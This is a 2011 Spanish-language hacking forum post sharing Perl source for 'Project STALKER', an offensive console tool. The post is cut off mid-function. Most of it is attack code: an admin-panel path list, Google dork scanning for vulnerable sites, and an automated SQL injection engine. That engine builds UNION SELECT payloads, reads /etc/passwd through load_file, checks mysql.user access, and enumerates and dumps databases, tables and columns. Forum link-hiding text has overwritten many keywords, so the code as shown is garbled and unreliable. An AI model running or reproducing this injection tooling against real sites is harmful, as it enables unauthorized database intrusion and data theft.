comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl] Project STALKER

  • 0 Respuestas
  • 1194 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Agosto 19, 2011, 11:30:36 pm »
Bueno esta es la nueva version de la consola que eh estado haciendo en perl con las siguiente funciones

  • Mejoras
[++] Diseño
[++] Repare algunos bugs
[++] Mejor manejo con control+c
[++] Agregue un cliente mysql

  • Opciones
[++] Reconocer ip de un host
[++] Capturar todos los links de una pagina
[++] Tener una lista de todos los procesos de windows con posibilidad de cerrar el que queramos
[++] Cliente mediante sockets
[++] Reconocer los metodos HTTP en una web
[++] Captura links y busca posibles paths para listado de directorios
[++] Encode/decode para base64,hex,ascii
[++] Scanner Port
[++] Busca panel de admin
[++] k0bra incorporado (Scanner SQLI)
[++] Cliente FTP
[++] Navegador de archivos con posibilidad de borrar,renombrar archivos o directorios
[++] Scan Google para buscar paginas vulnerables a SQLI

El codigo es el siguiente

Código: Perl
  1. #!usr/bin/perl
  2. #Project STALKER (C) Doddy Hackman 2011
  3. #
  4. #ppm install http://www.bribes.org/perl/ppm/DBI.ppd
  5. #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
  6. #
  7. #You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
  8. #
  9.  
  10. use IO::Socket;
  11. use HTML::LinkExtor;
  12. use LWP::UserAgent;
  13. use Win32::OLE No tienes permisos para ver links. Registrate o Entra con tu cuenta(in);
  14. use Win32::Process;
  15. use Net::FTP;
  16. use Cwd;
  17. use URI::Split No tienes permisos para ver links. Registrate o Entra con tu cuenta(uri_split);
  18. use MIME::Base64;
  19. use DBI;
  20. use Color::Output;
  21. Color::Output::Init
  22.  
  23. @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
  24. ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
  25. ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
  26. ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
  27. ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
  28. ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
  29. ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
  30. ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
  31. ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
  32. ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
  33. ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
  34. ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
  35. ,'administration/','administration/index.php','administration/login.php'
  36. ,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
  37. ,'system/login.php','admin.php','login.php','administrador.php','administration.php'
  38. ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
  39. ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
  40. ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
  41. ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
  42. ,'administrator/','administrator/index.html','administrator/login.html'
  43. ,'administrator/account.html','administrator/account.php','administrator.html','login.html'
  44. ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
  45. ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
  46. ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
  47. ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
  48. ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
  49. ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
  50. ,'administrator/login.asp','administrator/account.asp','administrator.asp'
  51. ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
  52. ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
  53. ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
  54. ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
  55. ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
  56. ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
  57. ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
  58. ,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
  59. ,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
  60. ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
  61. ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
  62. ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
  63. ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
  64. ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
  65. ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
  66. ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
  67. ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
  68. ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
  69. ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
  70. ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
  71. ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
  72. ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
  73. ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
  74. ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
  75. ,'server/','database_administration/','power_user/','system_administration/'
  76. ,'ss_vms_admin_sm/');
  77.  
  78.  
  79. unless (-d "/logs/webs") {
  80. No tienes permisos para ver links. Registrate o Entra con tu cuenta("logs/",777);
  81. No tienes permisos para ver links. Registrate o Entra con tu cuenta("logs/webs/",777);
  82. }
  83.  
  84. my $nave = LWP::UserAgent->new;
  85. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  86. $nave->timeout(5);
  87.  
  88. head();
  89.  
  90. getinfo();
  91.  
  92. $SIG{INT} = \&next;
  93.  
  94. while(1) {
  95. cprint "\x037"; #13
  96. menujo();
  97. cprint "\x030";
  98. }
  99.  
  100. sub getinfo {
  101. $so = $^O;
  102. $login = Win32::LoginName();
  103. $domain = Win32::DomainName();
  104. cprint "\x0313"; #13
  105. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
  106. cprint "\x030";
  107. }
  108.  
  109.  
  110. sub menujo {
  111. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n>";
  112. No tienes permisos para ver links. Registrate o Entra con tu cuenta (my $cmd = <stdin>);
  113. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n";
  114.  
  115. if ($cmd=~/getinfo/ig) {
  116. getinfo();
  117. }
  118. elsif ($cmd =~/getip (.*)/) {
  119. my $te = $1;
  120. if ($te eq "" or $te eq " ") {
  121. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] sintax : getip <host>\n";
  122. }
  123. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[IP] : ".getip($1)."\n";
  124. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n";
  125. }
  126.  
  127. elsif ($cmd =~/getlink (.*)/) {
  128. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Extracting links in the page\n\n\n";
  129. $code = toma($1);
  130. my @re = get_links($code);
  131. for my $url(@re) {
  132. No tienes permisos para ver links. Registrate o Entra con tu cuenta $url;
  133. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Link] : $url\n";
  134. }
  135. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Finish\n";
  136. }
  137.  
  138. elsif ($cmd=~/help/) {
  139. helpme();
  140. }
  141.  
  142. elsif ($cmd=~/getprocess/) {
  143. my %re = getprocess();
  144.  
  145.  
  146. for my $data(No tienes permisos para ver links. Registrate o Entra con tu cuenta %re) {
  147. ($proceso,$pid) = ($t=~/(.*):(.*)/ig);
  148. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Proceso : ".$data."\n";
  149. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] PID : ".$re{$data}."\n\n";
  150. }
  151. }
  152. elsif ($cmd=~/killprocess (.*) (.*)/) {
  153. if (killprocess($1,$2)) {
  154. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Process $1 closed";
  155. }
  156. }
  157. elsif ($cmd=~/conec (.*) (.*) (.*)/) {
  158. No tienes permisos para ver links. Registrate o Entra con tu cuenta conectar($1,$2,$3);
  159. }
  160. elsif ($cmd=~/allow (.*)/) {
  161. $re = conectar($1,"80","GET / HTTP/1.0\r\n");
  162. if ($re=~/Allow:(.*)/ig) {
  163. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Metodos : ".$1."\n";
  164. }}
  165. elsif ($cmd=~/paths (.*)/) {
  166. scanpaths($1);
  167. }
  168. elsif ($cmd=~/encodehex (.*)/) {
  169. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] ".hex_en($1)."\n\n";
  170. }
  171. elsif ($cmd=~/decodehex (.*)/) {
  172. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] ".hex_de($1)."\n\n";
  173. }
  174. elsif ($cmd=~/download (.*) (.*)/) {
  175. my $file,$name = $1,$2;
  176. if (download($1,$2)) {
  177. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] File downloaded\n";
  178. }
  179. }
  180. elsif ($cmd=~/encodeascii (.*)/) {
  181. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] ".ascii($1)."\n\n";
  182. }
  183. elsif ($cmd=~/decodeascii (.*)/) {
  184. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] ".ascii_de($1)."\n\n";
  185. }
  186. elsif ($cmd=~/encodebase (.*)/) {
  187. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] ".base($1)."\n\n";
  188. }
  189. elsif ($cmd=~/decodebase (.*)/) {
  190. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] ".base_de($1)."\n\n";
  191. }
  192. elsif ($cmd=~/aboutme/) {
  193. aboutme();
  194. }
  195. elsif ($cmd=~/scanport (.*)/) {
  196. scanport($1);
  197. }
  198. elsif ($cmd=~/panel (.*)/) {
  199. scanpanel($1);
  200. }
  201. elsif ($cmd=~/scangoogle/) {
  202. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Dork] : ";
  203. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $dork = <stdin>);
  204. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[Pages] : ";
  205. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $pages = <stdin>);
  206. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[Starting the search]\n\n";
  207. my @links = google($dork,$pages);
  208. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[Links Found] : ".No tienes permisos para ver links. Registrate o Entra con tu cuenta(@links)."\n\n\n";
  209. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Starting the scan]\n\n\n";
  210. for my $link(@links) {
  211. if ($link=~/(.*)=/ig) {
  212. my $web = $1;
  213. sql($web."=");
  214. }}
  215. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Finish\n";
  216. }
  217. elsif ($cmd=~/getpass (.*)/) {
  218. crackit($1);
  219. }
  220. elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
  221. ftp($1,$2,$3);
  222. }
  223. elsif ($cmd=~/navegator/) {
  224. nave:
  225. No tienes permisos para ver links. Registrate o Entra con tu cuenta getcwd().">";
  226. No tienes permisos para ver links. Registrate o Entra con tu cuenta(my $rta = <stdin>);
  227. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n";
  228. if ($rta=~/list/) {
  229. my @files = coleccionar(getcwd());
  230. for(@files) {
  231. if (-f $_) {
  232. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[File] : ".$_."\n";
  233. } else {
  234. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Directory] : ".$_."\n";
  235. }}}
  236. if ($rta=~/cd (.*)/) {
  237. my $dir = $1;
  238. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($dir)) {
  239. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Directory changed\n";
  240. } else {
  241. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[-] Error\n";
  242. }}
  243. if ($rta=~/del (.*)/) {
  244. my $file = getcwd()."/".$1;
  245. if (-f $file) {
  246. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($file)) {
  247. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] File Deleted\n";
  248. } else {
  249. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[-] Error\n";
  250. }
  251. } else {
  252. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta($file)) {
  253. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Directory Deleted\n";
  254. } else {
  255. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[-] Error\n";
  256. }}}
  257. if ($rta=~/No tienes permisos para ver links. Registrate o Entra con tu cuenta (.*) (.*)/) {
  258. if (No tienes permisos para ver links. Registrate o Entra con tu cuenta(getcwd()."/".$1,getcwd()."/".$2)) {
  259. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] File Changed\n";
  260. } else {
  261. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[-] Error\n";
  262. }}
  263. if ($rta=~/No tienes permisos para ver links. Registrate o Entra con tu cuenta (.*)/) {
  264. my $file = $1;
  265. No tienes permisos para ver links. Registrate o Entra con tu cuenta $file;
  266. No tienes permisos para ver links. Registrate o Entra con tu cuenta($file);
  267. #system(getcwd()."/".$file);
  268. }
  269. if ($rta=~/help/) {
  270. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\nCommands : help cd list del rename open exit\n\n";
  271. }
  272. if ($rta=~/No tienes permisos para ver links. Registrate o Entra con tu cuenta/) {
  273. next;
  274. }
  275. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n";
  276. No tienes permisos para ver links. Registrate o Entra con tu cuenta nave;
  277. }
  278. elsif ($cmd=~/kobra (.*)/) {
  279. my $url = $1;
  280. No tienes permisos para ver links. Registrate o Entra con tu cuenta $url;
  281. scansqli($url,"--");
  282. }
  283. elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
  284. enter($1,$2,$3);
  285. }
  286. elsif ($cmd=~/No tienes permisos para ver links. Registrate o Entra con tu cuenta/) {
  287. copyright();
  288. <stdin>;
  289. No tienes permisos para ver links. Registrate o Entra con tu cuenta(1);
  290. }
  291. else {
  292. No tienes permisos para ver links. Registrate o Entra con tu cuenta($cmd);
  293. }
  294. #print "\n\n";
  295. }
  296.  
  297.  
  298. sub scansqli {
  299. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Status] : Scanning.....\n";
  300. $pass = &bypass($_[1]);
  301. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  302. my $save = $auth;
  303. if ($_[0]=~/hackman/ig) {
  304. savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
  305. &menu_options($_[0],$pass,$save);
  306. }
  307. my ($gen,$save,$control) = &No tienes permisos para ver links. Registrate o Entra con tu cuenta($_[0],$_[1]);
  308. if ($control eq 1) {
  309. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Status] : Enjoy the menu\n\n";
  310. &menu_options($gen,$pass,$save);
  311. } else {
  312. No tienes permisos para ver links. Registrate o Entra con tu cuenta $control;
  313. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Status] : Length columns not found\n\n";
  314. menujo();
  315. }
  316. }
  317.  
  318. sub No tienes permisos para ver links. Registrate o Entra con tu cuenta {
  319. my $rows  = "0";
  320. my $asc;
  321. my $page = $_[0];
  322. ($pass1,$pass2) = &bypass($_[1]);
  323. $inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
  324. $code = toma($inyection);
  325. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) {
  326. my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
  327. my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
  328. unless ($testar1 eq $testar2) {
  329. my $patha = $1;
  330. No tienes permisos para ver links. Registrate o Entra con tu cuenta $patha;
  331. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  332. $total = "1";
  333. for my $rows(2..200) {
  334. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
  335. $total.= ",".$rows;
  336. $injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  337. $test = toma($injection);
  338. if ($test=~/RATSXPDOWN/) {
  339. @number = $test =~No tienes permisos para ver links. Registrate o Entra con tu cuenta{RATSXPDOWN(\d+)RATSXPDOWN}g;
  340. $control = 1;
  341. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  342. my $save = $auth;
  343. savefile($save.".txt","\n[Target confirmed] : $page");
  344. savefile($save.".txt","[Bypass] : $_[1]\n");
  345. savefile($save.".txt","[Limit] : The site has $rows columns");
  346. savefile($save.".txt","[Data] : The number @number print data");
  347. if ($patha) {
  348. savefile($save.".txt","[Full Path Discloure] : $patha");
  349. }
  350. $total=~No tienes permisos para ver links. Registrate o Entra con tu cuenta/$number[0]/hackman/;
  351. savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
  352. No tienes permisos para ver links. Registrate o Entra con tu cuenta($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
  353. }}}}}
  354.  
  355.  
  356. sub details {
  357. my ($page,$bypass,$save) = @_;
  358. ($pass1,$pass2) = &bypass($bypass);
  359. savefile($save.".txt","\n");
  360. if ($page=~/(.*)hackman(.*)/ig) {
  361. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Searching information..\n\n";
  362. my  ($start,$end) = ($1,$2);
  363. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
  364. $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
  365. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  366. $test1 = toma($inforschema);
  367. $test2 = toma($mysqluser);
  368. if ($test2=~/ERTOR854/ig) {
  369. savefile($save.".txt","[mysql.user] : ON");
  370. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[mysql.user] : ON\n";
  371. } else {
  372. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[mysql.user] : OFF\n";
  373. savefile($save.".txt","[mysql.user] : OFF");
  374. }
  375. if ($test1=~/ERTOR854/ig) {
  376. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[information_schema.tables] : ON\n";
  377. savefile($save.".txt","[information_schema.tables] : ON");
  378. } else {
  379. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[information_schema.tables] : OFF\n";
  380. savefile($save.".txt","[information_schema.tables] : OFF");
  381. }
  382. if ($test3=~/ERTOR854/ig) {
  383. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] load_file permite ver los archivos\n";
  384. savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  385. }
  386. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
  387. $injection = $start.$concat.$end.$pass2;
  388. $code = toma($injection);
  389. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  390. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
  391. savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
  392. } else {
  393. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[-] Not found any data\n";
  394. }}}
  395.  
  396.  
  397. sub menu_options {
  398.  
  399. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  400. my $save = $auth;
  401. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n/logs/webs/$save>";
  402. No tienes permisos para ver links. Registrate o Entra con tu cuenta (my $rta = <stdin>);
  403.  
  404. if ($rta=~/help/) {
  405. No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta(
  406.  
  407. commands : details tables columns dbs othertable othercolumn
  408.            mysqluser dumper logs No tienes permisos para ver links. Registrate o Entra con tu cuenta
  409.  
  410. );
  411. }
  412.  
  413.  
  414. if ($rta =~/tables/) {
  415. schematables($_[0],$_[1],$save);
  416. &reload;       
  417. }
  418. elsif ($rta =~/columns (.*)/) {
  419. my $tabla = $1;
  420. schemacolumns($_[0],$_[1],$save,$tabla);
  421. &reload;
  422. }
  423. elsif ($rta =~/dbs/) {
  424. &schemadb($_[0],$_[1],$save);
  425. &reload;
  426. }
  427. elsif ($rta =~/othertable (.*)/) {
  428. my $data = $1;
  429. &schematablesdb($_[0],$_[1],$data,$save);
  430. &reload;
  431. }
  432. elsif ($rta =~/othercolumn (.*) (.*)/){
  433. my ($db,$table) = ($1,$2);
  434. &schemacolumnsdb($_[0],$_[1],$db,$table,$save);
  435. &reload;
  436. }
  437. elsif ($rta =~/mysqluser/) {
  438. &mysqluser($_[0],$_[1],$save);
  439. &reload;
  440. }
  441. elsif ($rta=~/logs/) {
  442. $t = "logs/webs/$save.txt";
  443. No tienes permisos para ver links. Registrate o Entra con tu cuenta("start $t");
  444. &reload;
  445. }
  446. elsif ($rta=~/No tienes permisos para ver links. Registrate o Entra con tu cuenta/) {
  447. next;
  448. }
  449.  
  450. elsif ($rta=~/dumper (.*) (.*) (.*)/) {
  451. my ($tabla,$col1,$col2) = ($1,$2,$3);
  452. &No tienes permisos para ver links. Registrate o Entra con tu cuenta($_[0],$col1,$col2,$tabla,$_[1],$save);
  453. &reload;
  454. }
  455. elsif ($rta =~/details/) {
  456. &details($_[0],$_[1],$save);
  457. &reload;
  458. }
  459. else {
  460. &reload;
  461. }
  462. }
  463.  
  464.  
  465.  
  466. sub schematables {
  467. $real = "1";
  468. my ($page,$bypass,$save) = @_;
  469. savefile($save.".txt","\n");
  470. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n";
  471. my $page1 = $page;
  472. ($pass1,$pass2) = &bypass($_[1]);
  473. savefile($save.".txt","[DB] : default");
  474. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Searching tables with schema\n\n";
  475. $page =~No tienes permisos para ver links. Registrate o Entra con tu cuenta/hackman/unhex(No tienes permisos para ver links. Registrate o Entra con tu cuenta(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  476. $page1=~No tienes permisos para ver links. Registrate o Entra con tu cuenta/hackman/unhex(No tienes permisos para ver links. Registrate o Entra con tu cuenta(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  477. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
  478. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  479. my $resto = $1;
  480. $total = $resto - 17;
  481. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Tables Length :  $total\n\n";
  482. savefile($save.".txt","[+] Searching tables with schema\n");
  483. savefile($save.".txt","[+] Tables Length :  $total\n");
  484. my $limit = $1;
  485. for my $limit(17..$limit) {
  486. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
  487. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  488. my $table = $1;
  489. No tienes permisos para ver links. Registrate o Entra con tu cuenta $table;
  490. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Table $real Found : $table ]\n";
  491. savefile($save.".txt","[Table $real Found : $table ]");
  492. $real++;
  493. }}
  494. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n";
  495. } else {
  496. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[-] information_schema = ERROR\n";
  497. }        
  498. }
  499.  
  500. sub reload {
  501. &menu_options($_[0]);
  502. }
  503.  
  504.  
  505. sub schemacolumns {
  506. my ($page,$bypass,$save,$table) = @_;
  507. my $page3 = $page;
  508. my $page4 = $page;
  509. savefile($save.".txt","\n");
  510. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n";
  511. ($pass1,$pass2) = &bypass($bypass);
  512. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[DB] : default\n";
  513. savefile($save.".txt","[DB] : default");
  514. savefile($save.".txt","[Table] : $table\n");
  515. $page3=~No tienes permisos para ver links. Registrate o Entra con tu cuenta/hackman/unhex(No tienes permisos para ver links. Registrate o Entra con tu cuenta(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  516. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
  517. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  518. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[Columns Length : $1 ]\n\n";
  519. savefile($save.".txt","[Columns Length : $1 ]\n");
  520. my $si = $1;
  521. No tienes permisos para ver links. Registrate o Entra con tu cuenta $si;
  522. $page4=~No tienes permisos para ver links. Registrate o Entra con tu cuenta/hackman/unhex(No tienes permisos para ver links. Registrate o Entra con tu cuenta(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  523. $real = "1";
  524. for my $limit2(0..$si) {
  525. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  526. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  527. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Column $real] : $1\n";
  528. savefile($save.".txt","[Column $real] : $1");
  529. $real++;
  530. }}
  531. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n";
  532. } else {
  533. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[-] information_schema = ERROR\n";
  534. }}
  535.  
  536. sub schemadb {
  537. my ($page,$bypass,$save) = @_;
  538. my $page1 = $page;
  539. savefile($save.".txt","\n");
  540. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Searching DBS\n\n";
  541. ($pass1,$pass2) = &bypass($bypass);
  542. $page=~No tienes permisos para ver links. Registrate o Entra con tu cuenta/hackman/unhex(No tienes permisos para ver links. Registrate o Entra con tu cuenta(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  543. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
  544. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  545. my $limita = $1;
  546. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Databases Length : $limita\n\n";
  547. savefile($save.".txt","[+] Databases Length : $limita\n");
  548. $page1=~No tienes permisos para ver links. Registrate o Entra con tu cuenta/hackman/unhex(No tienes permisos para ver links. Registrate o Entra con tu cuenta(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  549. $real = "1";
  550. for my $limit(0..$limita) {
  551. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
  552. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  553. my $control = $1;
  554. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
